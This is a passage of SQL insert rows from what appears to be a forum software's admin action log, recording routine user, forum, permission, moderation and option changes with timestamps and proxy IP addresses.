(1375, 100, 1442766856, 'user.php', 'modify', '', '162.158.90.112'),
(1376, 100, 1442766861, 'user.php', 'find', '', '162.158.90.112'),
(1377, 100, 1442766861, 'user.php', 'edit', '', '162.158.90.112'),
(1378, 100, 1442766875, 'user.php', 'update', '', '162.158.90.112'),
(1379, 100, 1442766878, 'user.php', 'edit', 'user id = 41', '162.158.90.112'),
(1380, 100, 1442766888, 'user.php', 'update', 'user id = 41', '162.158.90.112'),
(1381, 100, 1442766889, 'user.php', 'modify', 'user id = 41', '162.158.90.112'),
(1382, 100, 1442767136, 'forum.php', 'modify', '', '162.158.90.112'),
(1383, 100, 1442767162, 'forumpermission.php', 'modify', '', '162.158.90.112'),
(1384, 13, 1442777436, 'forum.php', 'modify', '', '162.158.91.200'),
(1385, 13, 1442777465, 'user.php', 'find', '', '162.158.91.200'),
(1386, 13, 1442777473, 'user.php', 'findnames', '', '162.158.91.200'),
(1387, 13, 1442777482, 'user.php', 'reputation', 'user id = 13', '162.158.91.200'),
(1388, 13, 1442777487, 'user.php', 'viewuser', 'user id = 13', '162.158.91.200'),
(1389, 13, 1442777516, 'user.php', 'viewuser', 'user id = 13', '162.158.91.200'),
(1390, 13, 1442777525, 'user.php', 'viewuser', 'user id = 13', '162.158.91.200'),
(1391, 100, 1442783053, 'forum.php', 'modify', '', '162.158.90.112'),
(1392, 100, 1442783075, 'forum.php', 'remove', 'forum id = 25', '162.158.90.112'),
(1393, 100, 1442783077, 'forum.php', 'kill', 'forum id = 25', '162.158.90.112'),
(1394, 100, 1442783079, 'forum.php', '', '', '162.158.90.112'),
(1395, 100, 1442805463, 'user.php', 'add', '', '162.158.90.112'),
(1396, 100, 1442805496, 'user.php', 'update', '', '162.158.90.112'),
(1397, 100, 1442805498, 'user.php', 'modify', 'user id = 182', '162.158.90.112'),
(1398, 100, 1442831239, 'user.php', 'add', '', '162.158.90.112'),
(1399, 100, 1442831277, 'user.php', 'update', '', '162.158.90.112'),
(1400, 100, 1442831279, 'user.php', 'modify', 'user id = 183', '162.158.90.112'),
(1401, 100, 1442832733, 'user.php', 'modify', '', '162.158.90.112'),
(1402, 100, 1442832736, 'user.php', 'find', '', '162.158.90.112'),
(1403, 100, 1442832736, 'user.php', 'edit', 'user id = 182', '162.158.90.112'),
(1404, 100, 1442832775, 'user.php', 'update', 'user id = 182', '162.158.90.112'),
(1405, 100, 1442832776, 'user.php', 'modify', 'user id = 182', '162.158.90.112'),
(1406, 100, 1442832848, 'forum.php', 'modify', '', '162.158.90.112'),
(1407, 100, 1442832853, 'forum.php', 'edit', 'forum id = 19', '162.158.90.112'),
(1408, 100, 1442832858, 'forumpermission.php', 'modify', '', '162.158.90.112'),
(1409, 100, 1442832872, 'forumpermission.php', 'edit', 'forum id = 1 / usergroup id = 2', '162.158.90.112'),
(1410, 100, 1442832880, 'forumpermission.php', 'doupdate', '', '162.158.90.112'),
(1411, 100, 1442832882, 'forumpermission.php', 'modify', 'forum id = 1', '162.158.90.112'),
(1412, 100, 1442832899, 'forumpermission.php', 'edit', 'forum id = 4 / usergroup id = 8', '162.158.90.112'),
(1413, 100, 1442832906, 'forumpermission.php', 'edit', 'forum id = 2 / usergroup id = 8', '162.158.90.112'),
(1414, 1, 1442834601, 'forum.php', 'modify', '', '173.245.53.64'),
(1415, 100, 1442847907, 'user.php', 'add', '', '162.158.90.112'),
(1416, 100, 1442848090, 'user.php', 'update', '', '162.158.90.112'),
(1417, 100, 1442848135, 'user.php', 'add', '', '162.158.90.112'),
(1418, 100, 1442848176, 'user.php', 'update', '', '162.158.90.112'),
(1419, 100, 1442848180, 'user.php', 'modify', 'user id = 184', '162.158.90.112'),
(1420, 100, 1442915515, 'forum.php', 'modify', '', '141.101.80.172'),
(1421, 100, 1442915527, 'forum.php', 'add', '', '141.101.80.172'),
(1422, 100, 1442915572, 'forum.php', 'update', '', '141.101.80.172'),
(1423, 100, 1442915574, 'forum.php', 'modify', 'forum id = 31', '141.101.80.172'),
(1424, 100, 1442915579, 'forum.php', 'add', '', '141.101.80.172'),
(1425, 100, 1442915787, 'forum.php', 'update', '', '141.101.80.172'),
(1426, 100, 1442915789, 'forum.php', 'modify', 'forum id = 32', '141.101.80.172'),
(1427, 100, 1442915804, 'forum.php', 'add', '', '141.101.80.172'),
(1428, 100, 1442915818, 'forum.php', 'update', '', '141.101.80.172'),
(1429, 100, 1442915820, 'forum.php', 'modify', 'forum id = 33', '141.101.80.172'),
(1430, 100, 1442915824, 'forum.php', 'add', '', '141.101.80.172'),
(1431, 100, 1442915832, 'forum.php', 'update', '', '141.101.80.172'),
(1432, 100, 1442915833, 'forum.php', 'modify', 'forum id = 34', '141.101.80.172'),
(1433, 100, 1442915847, 'forum.php', 'remove', 'forum id = 33', '141.101.80.172'),
(1434, 100, 1442915849, 'forum.php', 'kill', 'forum id = 33', '141.101.80.172'),
(1435, 100, 1442915850, 'forum.php', '', '', '141.101.80.172'),
(1436, 100, 1442915859, 'forum.php', 'add', '', '141.101.80.172'),
(1437, 100, 1442915867, 'forum.php', 'update', '', '141.101.80.172'),
(1438, 100, 1442915868, 'forum.php', 'modify', 'forum id = 35', '141.101.80.172'),
(1439, 100, 1442915874, 'forum.php', 'add', '', '141.101.80.172'),
(1440, 100, 1442915881, 'forum.php', 'update', '', '141.101.80.172'),
(1441, 100, 1442915883, 'forum.php', 'modify', 'forum id = 36', '141.101.80.172'),
(1442, 100, 1442915888, 'forum.php', 'add', '', '141.101.80.172'),
(1443, 100, 1442915978, 'forum.php', 'update', '', '141.101.80.172'),
(1444, 100, 1442915980, 'forum.php', 'modify', 'forum id = 37', '141.101.80.172'),
(1445, 100, 1442915989, 'forum.php', 'edit', 'forum id = 31', '141.101.80.172'),
(1446, 100, 1442916011, 'forum.php', 'update', 'forum id = 31', '141.101.80.172'),
(1447, 100, 1442916012, 'forum.php', 'modify', 'forum id = 31', '141.101.80.172'),
(1448, 100, 1442916059, 'forum.php', 'add', '', '141.101.80.172'),
(1449, 100, 1442916066, 'forum.php', 'update', '', '141.101.80.172'),
(1450, 100, 1442916068, 'forum.php', 'modify', 'forum id = 38', '141.101.80.172'),
(1451, 100, 1442916073, 'forumpermission.php', 'modify', '', '141.101.80.172'),
(1452, 100, 1442916110, 'forum.php', 'modify', '', '141.101.80.172'),
(1453, 100, 1442916131, 'forum.php', 'add', '', '141.101.80.172'),
(1454, 100, 1442916140, 'forum.php', 'update', '', '141.101.80.172'),
(1455, 100, 1442916142, 'forum.php', 'modify', 'forum id = 39', '141.101.80.172'),
(1456, 100, 1442916166, 'forum.php', 'doorder', '', '141.101.80.172'),
(1457, 100, 1442916176, 'forum.php', 'modify', '', '141.101.80.172'),
(1458, 100, 1442916230, 'forumpermission.php', 'modify', '', '141.101.80.172'),
(1459, 100, 1442922117, 'notice.php', 'modify', '', '141.101.80.172'),
(1460, 100, 1442922123, 'faq.php', '', '', '141.101.80.172'),
(1461, 100, 1442922136, 'faq.php', '', '', '141.101.80.172'),
(1462, 100, 1442922159, 'options.php', 'searchtype', '', '141.101.80.172'),
(1463, 100, 1442922163, 'options.php', '', '', '141.101.80.172'),
(1464, 100, 1442922270, 'language.php', 'modify', '', '141.101.80.172'),
(1465, 100, 1442922283, 'language.php', 'delete', 'Language ID = 2', '141.101.80.172'),
(1466, 100, 1442922285, 'language.php', 'kill', 'Language ID = 2', '141.101.80.172'),
(1467, 100, 1442922287, 'language.php', '', '', '141.101.80.172'),
(1468, 100, 1442922296, 'language.php', 'edit_settings', 'Language ID = 1', '141.101.80.172'),
(1469, 100, 1442922302, 'language.php', 'edit', 'Language ID = 1', '141.101.80.172'),
(1470, 100, 1442922348, 'language.php', 'modify', '', '141.101.80.172'),
(1471, 100, 1442922356, 'faq.php', '', '', '141.101.80.172'),
(1472, 100, 1442922360, 'phrase.php', 'search', '', '141.101.80.172'),
(1473, 100, 1442922410, 'phrase.php', 'dosearch', '', '141.101.80.172'),
(1474, 100, 1442922416, 'phrase.php', 'edit', '', '141.101.80.172'),
(1475, 100, 1442922439, 'phrase.php', 'edit', '', '141.101.80.172'),
(1476, 100, 1442923553, 'phrase.php', 'update', '', '141.101.80.172'),
(1477, 100, 1442923554, 'phrase.php', '', '', '141.101.80.172'),
(1478, 100, 1442923697, 'phrase.php', 'update', '', '141.101.80.172'),
(1479, 100, 1442923699, 'phrase.php', '', '', '141.101.80.172'),
(1480, 100, 1442923792, 'phrase.php', 'update', '', '141.101.80.172'),
(1481, 100, 1442923793, 'phrase.php', '', '', '141.101.80.172'),
(1482, 100, 1442924044, 'phrase.php', 'update', '', '141.101.80.172'),
(1483, 100, 1442924047, 'phrase.php', '', '', '141.101.80.172'),
(1484, 100, 1442924869, 'user.php', 'add', '', '141.101.80.172'),
(1485, 100, 1442924901, 'user.php', 'update', '', '141.101.80.172'),
(1486, 100, 1442924903, 'user.php', 'modify', 'user id = 185', '141.101.80.172'),
(1487, 100, 1442930223, 'user.php', 'modify', '', '141.101.80.172'),
(1488, 100, 1442930230, 'notice.php', 'modify', '', '141.101.80.172'),
(1489, 100, 1442930234, 'faq.php', '', '', '141.101.80.172'),
(1490, 100, 1442930238, 'phrase.php', 'search', '', '141.101.80.172'),
(1491, 100, 1442930244, 'phrase.php', 'dosearch', '', '141.101.80.172'),
(1492, 100, 1442930247, 'phrase.php', 'edit', '', '141.101.80.172'),
(1493, 100, 1442930266, 'phrase.php', 'update', '', '141.101.80.172'),
(1494, 1, 1442931506, 'options.php', '', '', '141.101.98.162'),
(1495, 1, 1442931510, 'options.php', 'options', '', '141.101.98.162'),
(1496, 1, 1442931520, 'options.php', 'options', '', '141.101.98.162'),
(1497, 1, 1442931527, 'options.php', 'options', '', '141.101.98.162'),
(1498, 100, 1443123954, 'user.php', 'add', '', '141.101.80.172'),
(1499, 100, 1443123999, 'user.php', 'update', '', '141.101.80.172'),
(1500, 100, 1443124000, 'user.php', 'modify', 'user id = 186', '141.101.80.172'),
(1501, 100, 1443129348, 'user.php', 'add', '', '141.101.80.172'),
(1502, 100, 1443129384, 'user.php', 'update', '', '141.101.80.172'),
(1503, 100, 1443129389, 'user.php', 'modify', 'user id = 187', '141.101.80.172'),
(1504, 100, 1443208346, 'adminreputation.php', 'modify', '', '141.101.80.137'),
(1505, 100, 1443208364, 'rssposter.php', 'modify', '', '141.101.80.137'),
(1506, 100, 1443208368, 'rssposter.php', 'edit', '', '141.101.80.137'),
(1507, 100, 1443208389, 'rssposter.php', 'modify', '', '141.101.80.137'),
(1508, 100, 1443208391, 'rssposter.php', 'edit', '', '141.101.80.137'),
(1509, 100, 1443208423, 'options.php', '', '', '141.101.80.137'),
(1510, 100, 1443208431, 'options.php', 'options', '', '141.101.80.137'),
(1511, 100, 1443208448, 'options.php', 'dooptions', '', '141.101.80.137'),
(1512, 100, 1443208450, 'options.php', 'options', '', '141.101.80.137'),
(1513, 100, 1443208500, 'options.php', 'options', '', '141.101.80.137'),
(1514, 100, 1443208519, 'options.php', 'dooptions', '', '141.101.80.137'),
(1515, 100, 1443208522, 'options.php', 'options', '', '141.101.80.137'),
(1516, 100, 1443290203, 'moderate.php', 'posts', '', '141.101.80.252'),
(1517, 29, 1443393608, 'usergroup.php', 'modify', '', '162.158.90.126'),
(1518, 29, 1443393610, 'user.php', 'modify', '', '162.158.90.126'),
(1519, 29, 1443393618, 'user.php', 'find', '', '162.158.90.126'),
(1520, 29, 1443393618, 'user.php', 'edit', '', '162.158.90.126'),
(1521, 29, 1443393631, 'user.php', 'modify', '', '162.158.90.126'),
(1522, 29, 1443393634, 'user.php', 'find', '', '162.158.90.126'),
(1523, 29, 1443393634, 'user.php', 'edit', '', '162.158.90.126'),
(1524, 29, 1443393642, 'user.php', 'find', '', '162.158.90.126'),
(1525, 29, 1443393642, 'user.php', 'edit', '', '162.158.90.126'),
(1526, 29, 1443393650, 'user.php', 'find', '', '162.158.90.126'),
(1527, 29, 1443393650, 'user.php', 'edit', '', '162.158.90.126'),
(1528, 29, 1443393659, 'user.php', 'find', '', '162.158.90.126'),
(1529, 29, 1443393664, 'user.php', 'edit', '', '162.158.90.126'),
(1530, 29, 1443393667, 'user.php', 'find', '', '162.158.90.126'),
(1531, 29, 1443393672, 'user.php', 'edit', '', '162.158.90.126'),
(1532, 29, 1443393676, 'user.php', 'edit', 'user id = 29', '162.158.90.126'),
(1533, 29, 1443393680, 'user.php', 'editaccess', 'user id = 29', '162.158.90.126'),
(1534, 29, 1443393695, 'user.php', 'edit', 'user id = 29', '162.158.90.126'),
(1535, 29, 1443393702, 'usertools.php', 'doips', 'user id = 29', '162.158.90.126'),
(1536, 29, 1443393705, 'user.php', 'edit', 'user id = 29', '162.158.90.126'),
(1537, 29, 1443393721, 'user.php', 'edit', '', '162.158.90.126'),
(1538, 29, 1443393723, 'user.php', 'find', '', '162.158.90.126'),
(1539, 29, 1443393726, 'user.php', 'edit', '', '162.158.90.126'),
(1540, 100, 1443897927, 'user.php', 'add', '', '141.101.80.137'),
(1541, 100, 1443898195, 'user.php', 'update', '', '141.101.80.137'),
(1542, 100, 1443898198, 'user.php', 'modify', 'user id = 188', '141.101.80.137'),
(1543, 100, 1444496143, 'user.php', 'modify', '', '141.101.80.252'),
(1544, 100, 1444496149, 'user.php', 'find', '', '141.101.80.252'),
(1545, 100, 1444496165, 'user.php', 'find', '', '141.101.80.252'),
(1546, 100, 1444496167, 'user.php', 'add', '', '141.101.80.252'),
(1547, 100, 1444496184, 'user.php', 'update', '', '141.101.80.252'),
(1548, 100, 1444496185, 'user.php', 'modify', 'user id = 189', '141.101.80.252'),
(1549, 1, 1444745689, 'user.php', 'modify', '', '141.101.104.54'),
(1550, 1, 1444745691, 'user.php', 'find', '', '141.101.104.54'),
(1551, 1, 1444745692, 'user.php', 'find', '', '141.101.104.54'),
(1552, 1, 1444745694, 'user.php', 'find', '', '141.101.104.54'),
(1553, 1, 1444745694, 'user.php', 'find', '', '141.101.104.54'),
(1554, 1, 1444745696, 'user.php', 'find', '', '141.101.104.54'),
(1555, 1, 1444745697, 'user.php', 'edit', 'user id = 171', '141.101.104.54'),
(1556, 1, 1444745729, 'user.php', 'update', 'user id = 171', '141.101.104.54'),
(1557, 1, 1444745730, 'user.php', 'modify', 'user id = 171', '141.101.104.54'),
(1558, 100, 1444799523, 'user.php', 'modify', '', '141.101.80.166'),
(1559, 100, 1444799529, 'user.php', 'find', '', '141.101.80.166'),
(1560, 100, 1444799530, 'user.php', 'edit', 'user id = 171', '141.101.80.166'),
(1561, 100, 1444799542, 'user.php', 'editaccess', 'user id = 171', '141.101.80.166'),
(1562, 100, 1444799547, 'user.php', 'edit', 'user id = 171', '141.101.80.166'),
(1563, 100, 1444799587, 'user.php', 'update', 'user id = 171', '141.101.80.166'),
(1564, 100, 1444799589, 'user.php', 'modify', 'user id = 171', '141.101.80.166'),
(1565, 100, 1445803048, 'attachment.php', 'types', '', '141.101.104.217'),
(1566, 100, 1445803054, 'attachmentpermission.php', '', '', '141.101.104.217'),
(1567, 100, 1445803064, 'template.php', 'modify', '', '141.101.104.217'),
(1568, 100, 1445803065, 'template.php', 'modify', '', '141.101.104.217'),
(1569, 100, 1445803070, 'css.php', 'edit', 'style id = 2', '141.101.104.217'),
(1570, 100, 1445803130, 'replacement.php', 'modify', '', '141.101.104.217'),
(1571, 100, 1445803150, 'backup.php', 'choose', '', '141.101.104.217'),
(1572, 100, 1445803338, 'backup.php', 'choose', '', '141.101.104.217'),
(1573, 100, 1445803342, 'repair.php', 'list', '', '141.101.104.217'),
(1574, 100, 1445803359, 'usertools.php', 'merge', '', '141.101.104.217'),
(1575, 100, 1445803363, 'user.php', 'modify', '', '141.101.104.217'),
(1576, 100, 1445803386, 'email.php', 'genlist', '', '108.162.216.192'),
(1577, 1, 1445869467, 'user.php', 'add', '', '141.101.104.54'),
(1578, 1, 1445869467, 'user.php', 'modify', '', '141.101.104.54'),
(1579, 1, 1445869469, 'user.php', 'find', '', '141.101.104.54'),
(1580, 1, 1445869471, 'user.php', 'find', '', '141.101.104.54'),
(1581, 1, 1445869473, 'user.php', 'find', '', '141.101.104.54'),
(1582, 1, 1445869475, 'user.php', 'edit', 'user id = 164', '141.101.104.54'),
(1583, 1, 1445869502, 'user.php', 'update', 'user id = 164', '141.101.104.54'),
(1584, 1, 1445869504, 'user.php', 'modify', 'user id = 164', '141.101.104.54'),
(1585, 100, 1445942104, 'user.php', 'add', '', '141.101.80.19'),
(1586, 100, 1445942144, 'user.php', 'update', '', '141.101.80.19'),
(1587, 100, 1445942146, 'user.php', 'modify', 'user id = 190', '141.101.80.19'),
(1588, 100, 1446216912, 'forumpermission.php', 'modify', '', '141.101.80.23'),
(1589, 100, 1446216952, 'forum.php', 'edit', 'forum id = 31', '141.101.80.23'),
(1590, 100, 1446216965, 'forum.php', 'update', 'forum id = 31', '141.101.80.23'),
(1591, 100, 1446216966, 'forum.php', 'modify', 'forum id = 31', '141.101.80.23'),
(1592, 100, 1446216969, 'forum.php', 'edit', 'forum id = 32', '141.101.80.23'),
(1593, 100, 1446216976, 'forum.php', 'update', 'forum id = 32', '141.101.80.23'),
(1594, 100, 1446216977, 'forum.php', 'modify', 'forum id = 32', '141.101.80.23'),
(1595, 100, 1446216986, 'forum.php', 'edit', 'forum id = 35', '141.101.80.23'),
(1596, 100, 1446216995, 'forum.php', 'update', 'forum id = 35', '141.101.80.23'),
(1597, 100, 1446216996, 'forum.php', 'modify', 'forum id = 35', '141.101.80.23'),
(1598, 100, 1446216998, 'forum.php', 'edit', 'forum id = 36', '141.101.80.23'),
(1599, 100, 1446217006, 'forum.php', 'update', 'forum id = 36', '141.101.80.23'),
(1600, 100, 1446217008, 'forum.php', 'modify', 'forum id = 36', '141.101.80.23'),
(1601, 100, 1446217010, 'forum.php', 'edit', 'forum id = 37', '141.101.80.23'),
(1602, 100, 1446217017, 'forum.php', 'update', 'forum id = 37', '141.101.80.23'),
(1603, 100, 1446217018, 'forum.php', 'update', 'forum id = 37', '141.101.80.23'),
(1604, 100, 1446217020, 'forum.php', 'modify', 'forum id = 37', '141.101.80.23'),
(1605, 100, 1446217025, 'forum.php', 'edit', 'forum id = 38', '141.101.80.23'),
(1606, 100, 1446217031, 'forum.php', 'update', 'forum id = 38', '141.101.80.23'),
(1607, 100, 1446217032, 'forum.php', 'modify', 'forum id = 38', '141.101.80.23'),
(1608, 100, 1446217041, 'options.php', '', '', '141.101.80.23'),
(1609, 100, 1446217045, 'options.php', 'options', '', '141.101.80.23'),
(1610, 100, 1446217056, 'options.php', 'dooptions', '', '141.101.80.23'),
(1611, 100, 1446217058, 'options.php', 'options', '', '141.101.80.23'),
(1612, 1, 1447240050, 'user.php', 'modify', '', '141.101.104.46'),
(1613, 1, 1447240051, 'user.php', 'find', '', '141.101.104.46'),
(1614, 1, 1447240054, 'user.php', 'find', '', '141.101.104.46'),
(1615, 1, 1447240057, 'user.php', 'find', '', '141.101.104.46'),
(1616, 1, 1447240064, 'user.php', 'edit', 'user id = 276', '141.101.104.46'),
(1617, 1, 1447240098, 'user.php', 'update', 'user id = 276', '141.101.104.46'),
(1618, 1, 1447240099, 'user.php', 'modify', 'user id = 276', '141.101.104.46'),
(1619, 188, 1447769176, 'user.php', 'viewuser', 'user id = 177', '141.101.80.10'),
(1620, 188, 1447769207, 'user.php', 'find', '', '141.101.80.10'),
(1621, 188, 1447769218, 'user.php', 'findnames', '', '141.101.80.10'),
(1622, 188, 1447769222, 'user.php', 'viewuser', 'user id = 177', '141.101.80.10'),
(1623, 188, 1447769224, 'user.php', 'profilepic', 'user id = 177', '141.101.80.10'),
(1624, 188, 1447769226, 'user.php', 'reputation', 'user id = 177', '141.101.80.10'),
(1625, 188, 1447769307, 'user.php', 'findnames', '', '141.101.80.10'),
(1626, 188, 1447769311, 'user.php', 'viewuser', 'user id = 177', '141.101.80.10'),
(1627, 188, 1447769330, 'user.php', 'doips', '', '141.101.80.10'),
(1628, 188, 1447769340, 'user.php', 'doips', '', '141.101.80.10'),
(1629, 188, 1447769346, 'user.php', 'doips', '', '141.101.80.10'),
(1630, 188, 1447769349, 'user.php', 'gethost', '', '141.101.80.10'),
(1631, 188, 1447769433, 'user.php', 'doips', '', '141.101.80.10'),
(1632, 188, 1447769470, 'user.php', 'doips', '', '141.101.80.10'),
(1633, 188, 1447769534, 'user.php', 'doips', '', '141.101.80.10'),
(1634, 188, 1447769594, 'user.php', 'find', '', '141.101.80.10'),
(1635, 188, 1447769623, 'user.php', 'findnames', '', '141.101.80.10'),
(1636, 188, 1447769629, 'thread.php', 'prune', '', '141.101.80.10'),
(1637, 188, 1447769632, 'thread.php', 'move', '', '141.101.80.10'),
(1638, 188, 1447769634, 'user.php', 'doips', '', '141.101.80.10'),
(1639, 188, 1447769653, 'user.php', 'doips', '', '141.101.80.10'),
(1640, 188, 1447769655, 'user.php', 'doips', '', '141.101.80.10'),
(1641, 188, 1447769677, 'user.php', 'doips', 'user id = 177', '141.101.80.10'),
(1642, 188, 1447769712, 'user.php', 'doips', '', '141.101.80.10'),
(1643, 188, 1447769725, 'banning.php', 'modify', '', '141.101.80.10'),
(1644, 188, 1447769731, 'moderate.php', 'events', '', '141.101.80.10'),
(1645, 188, 1447769732, 'moderate.php', 'attachments', '', '141.101.80.10'),
(1646, 188, 1447769733, 'moderate.php', 'posts', '', '141.101.80.10'),
(1647, 188, 1447769747, 'moderate.php', 'posts', '', '141.101.80.10'),
(1648, 188, 1447769751, 'moderate.php', 'attachments', '', '141.101.80.10'),
(1649, 188, 1447769752, 'moderate.php', 'events', '', '141.101.80.10'),
(1650, 188, 1447769753, 'moderate.php', 'attachments', '', '141.101.80.10'),
(1651, 188, 1447769755, 'moderate.php', 'messages', '', '141.101.80.10'),
(1652, 188, 1447769756, 'announcement.php', 'add', '', '141.101.80.10'),
(1653, 188, 1447769759, 'forum.php', 'modify', '', '141.101.80.10'),
(1654, 188, 1447769771, 'user.php', 'doips', '', '141.101.80.10'),
(1655, 188, 1447769825, 'user.php', 'doips', '', '141.101.80.10'),
(1656, 188, 1447769998, 'announcement.php', 'add', '', '141.101.80.10'),
(1657, 188, 1447769999, 'forum.php', 'modify', '', '141.101.80.10'),
(1658, 188, 1447770090, 'user.php', 'find', '', '141.101.80.10'),
(1659, 188, 1447770098, 'user.php', 'findnames', '', '141.101.80.10'),
(1660, 188, 1447770102, 'user.php', 'viewuser', 'user id = 188', '141.101.80.10'),
(1661, 188, 1447770104, 'user.php', 'editsig', 'user id = 188', '141.101.80.10'),
(1662, 188, 1447770105, 'user.php', 'avatar', 'user id = 188', '141.101.80.10'),
(1663, 188, 1447770106, 'user.php', 'profilepic', 'user id = 188', '141.101.80.10'),
(1664, 188, 1447770107, 'user.php', 'reputation', 'user id = 188', '141.101.80.10'),
(1665, 188, 1447770138, 'user.php', 'viewuser', 'user id = 177', '141.101.80.10'),
(1666, 188, 1447770143, 'user.php', 'find', '', '141.101.80.10'),
(1667, 188, 1447770147, 'user.php', 'findnames', '', '141.101.80.10'),
(1668, 188, 1447770148, 'user.php', 'viewuser', 'user id = 177', '141.101.80.10'),
(1669, 100, 1449040766, 'forum.php', 'modify', '', '141.101.80.23'),
(1670, 100, 1449040785, 'forum.php', 'remove', 'forum id = 19', '141.101.80.23'),
(1671, 100, 1449040790, 'forum.php', 'kill', 'forum id = 19', '141.101.80.23'),
(1672, 100, 1449040791, 'forum.php', '', '', '141.101.80.23'),
(1673, 100, 1449040816, 'forumpermission.php', 'modify', '', '141.101.80.23'),
(1674, 100, 1449040820, 'forumpermission.php', 'quickset', 'forum id = 1', '141.101.80.23'),
(1675, 100, 1449040821, 'forumpermission.php', 'modify', 'forum id = 1', '141.101.80.23'),
(1676, 100, 1449040829, 'forumpermission.php', 'quickset', 'forum id = 11', '141.101.80.23'),
(1677, 100, 1449040830, 'forumpermission.php', 'modify', 'forum id = 11', '141.101.80.23'),
(1678, 100, 1449040836, 'forumpermission.php', 'quickset', 'forum id = 6', '141.101.80.23'),
(1679, 100, 1449040838, 'forumpermission.php', 'modify', 'forum id = 6', '141.101.80.23'),
(1680, 100, 1449040843, 'forumpermission.php', 'quickset', 'forum id = 14', '141.101.80.23'),
(1681, 100, 1449040844, 'forumpermission.php', 'modify', 'forum id = 14', '141.101.80.23'),
(1682, 100, 1449040889, 'forum.php', 'edit', 'forum id = 24', '141.101.80.23'),
(1683, 100, 1449040916, 'forum.php', 'update', 'forum id = 24', '141.101.80.23'),
(1684, 100, 1449040918, 'forum.php', 'modify', 'forum id = 24', '141.101.80.23'),
(1685, 100, 1449043391, 'moderate.php', 'posts', '', '141.101.80.23'),
(1686, 100, 1449075682, 'moderate.php', 'posts', '', '141.101.81.6'),
(1687, 100, 1449075721, 'moderate.php', 'doposts', '', '141.101.81.6'),
(1688, 100, 1449075722, 'moderate.php', 'posts', '', '141.101.81.6'),
(1689, 100, 1449075736, 'moderate.php', 'posts', '', '141.101.81.6'),
(1690, 100, 1449124489, 'moderate.php', 'posts', '', '141.101.81.6'),
(1691, 100, 1449156136, 'moderate.php', 'posts', '', '141.101.80.23'),
(1692, 100, 1449156199, 'moderate.php', 'posts', '', '141.101.80.23'),
(1693, 100, 1449157346, 'moderate.php', 'posts', '', '141.101.80.23'),
(1694, 100, 1449219649, 'moderate.php', 'posts', '', '141.101.80.23'),
(1695, 100, 1449241602, 'moderate.php', 'posts', '', '141.101.80.23'),
(1696, 100, 1449424978, 'moderate.php', 'posts', '', '141.101.80.23'),
(1697, 100, 1449425349, 'moderate.php', 'posts', '', '141.101.80.23'),
(1698, 100, 1449468633, 'moderate.php', 'posts', '', '141.101.80.23'),
(1699, 100, 1449482360, 'moderate.php', 'posts', '', '141.101.80.23'),
(1700, 100, 1449482372, 'moderate.php', 'posts', '', '141.101.80.23'),
(1701, 100, 1449482406, 'user.php', 'edit', 'user id = 294', '141.101.80.23'),
(1702, 100, 1449505232, 'moderate.php', 'posts', '', '141.101.80.23'),
(1703, 100, 1449548748, 'moderate.php', 'posts', '', '141.101.80.23'),
(1704, 100, 1449571313, 'moderate.php', 'posts', '', '141.101.80.23'),
(1705, 100, 1449571326, 'options.php', 'searchtype', '', '141.101.80.23'),
(1706, 100, 1449571333, 'template.php', 'search', '', '141.101.80.23'),
(1707, 100, 1449571342, 'template.php', 'modify', '', '141.101.80.23'),
(1708, 100, 1449571350, 'template.php', 'dodisplayorder', '', '141.101.80.23'),
(1709, 100, 1449571357, 'phrase.php', 'search', '', '141.101.80.23'),
(1710, 100, 1449571360, 'phrase.php', 'dosearch', '', '141.101.80.23'),
(1711, 100, 1449571368, 'phrase.php', 'dosearch', '', '141.101.80.23'),
(1712, 100, 1449571381, 'faq.php', '', '', '141.101.80.23'),
(1713, 100, 1449571416, 'options.php', 'searchtype', '', '141.101.80.23'),
(1714, 100, 1449571418, 'options.php', 'dosearchtype', '', '141.101.80.23'),
(1715, 100, 1449571423, 'options.php', '', '', '141.101.80.23'),
(1716, 100, 1449588247, 'moderate.php', 'posts', '', '141.101.80.23'),
(1717, 100, 1449593734, 'moderate.php', 'posts', '', '141.101.80.23'),
(1718, 100, 1449593832, 'moderate.php', 'doposts', '', '141.101.80.23'),
(1719, 100, 1449593834, 'moderate.php', 'posts', '', '141.101.80.23'),
(1720, 100, 1449669887, 'moderate.php', 'posts', '', '141.101.80.23'),
(1721, 100, 1449669915, 'moderate.php', 'posts', '', '141.101.80.23'),
(1722, 100, 1449760844, 'moderate.php', 'posts', '', '141.101.81.10'),
(1723, 29, 1449764946, 'options.php', '', '', '162.158.88.25'),
(1724, 29, 1449764950, 'options.php', 'options', '', '162.158.88.25'),
(1725, 100, 1449847935, 'moderate.php', 'posts', '', '141.101.80.23'),
(1726, 100, 1449896056, 'moderate.php', 'posts', '', '141.101.80.23'),
(1727, 100, 1450195230, 'moderate.php', 'posts', '', '141.101.80.23'),
(1728, 1, 1450271392, 'user.php', 'modify', '', '141.101.104.54'),
(1729, 1, 1450271394, 'user.php', 'find', '', '141.101.104.54'),
(1730, 1, 1450271396, 'user.php', 'find', '', '141.101.104.54'),
(1731, 1, 1450271397, 'user.php', 'find', '', '141.101.104.54'),
(1732, 1, 1450271398, 'user.php', 'find', '', '141.101.104.54'),
(1733, 1, 1450271398, 'user.php', 'find', '', '141.101.104.54'),
(1734, 1, 1450271399, 'user.php', 'find', '', '141.101.104.54'),
(1735, 1, 1450271400, 'user.php', 'find', '', '141.101.104.54'),
(1736, 1, 1450271401, 'user.php', 'find', '', '141.101.104.54'),
(1737, 1, 1450271402, 'user.php', 'find', '', '141.101.104.54'),
(1738, 1, 1450271402, 'user.php', 'find', '', '141.101.104.54'),
(1739, 1, 1450271404, 'user.php', 'find', '', '141.101.104.54'),
(1740, 100, 1450367407, 'moderate.php', 'posts', '', '141.101.80.23'),
(1741, 100, 1450779023, 'user.php', 'find', '', '141.101.80.23'),
(1742, 100, 1450779036, 'user.php', 'find', '', '141.101.80.23'),
(1743, 100, 1450779367, 'user.php', 'find', '', '141.101.80.23'),
(1744, 100, 1450781102, 'moderate.php', 'posts', '', '141.101.80.23'),
(1745, 100, 1450798572, 'user.php', 'find', '', '141.101.80.23'),
(1746, 100, 1450798573, 'user.php', 'edit', 'user id = 173', '141.101.80.23'),
(1747, 100, 1450798583, 'user.php', 'update', 'user id = 173', '141.101.80.23'),
(1748, 100, 1450798583, 'user.php', 'update', 'user id = 173', '141.101.80.23'),
(1749, 100, 1450798585, 'user.php', 'modify', 'user id = 173', '141.101.80.23'),
(1750, 100, 1450799477, 'moderate.php', 'posts', '', '141.101.80.23'),
(1751, 173, 1450799515, 'user.php', 'viewuser', 'user id = 277', '173.245.54.190'),
(1752, 173, 1450799544, 'banning.php', 'banuser', '', '173.245.54.190'),
